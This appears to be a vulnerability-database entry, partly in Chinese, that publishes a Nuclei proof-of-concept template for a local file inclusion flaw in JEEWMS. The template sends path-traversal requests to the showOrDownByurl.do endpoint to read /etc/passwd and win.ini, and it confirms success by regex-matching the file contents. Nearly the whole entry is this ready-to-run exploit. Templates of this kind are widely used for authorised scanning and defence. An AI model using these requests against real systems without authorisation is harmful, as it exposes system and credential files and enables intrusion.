jeewms-lfi: JEEWMS - Local File Inclusion

日期: 2025-08-01 | 影响软件: JEEWMS | POC: 已公开

漏洞描述

JEEWMS is vulnerable to local file inclusion.

PoC代码[已公开]

id: jeewms-lfi

info:
  name: JEEWMS - Local File Inclusion
  author: pikpikcu
  severity: high
  description: JEEWMS is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: jeewms,lfi,vuln

http:
  - raw:
      - | #linux
        GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - | #windows
        GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210080bce89246cba99d739c89a24c75e86215aac59121bca7adefdbe6d045b5af740221009c23bcd613d45a2a565a85b5d82cd7b48ac90576c949819962eb8927bb8006c0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐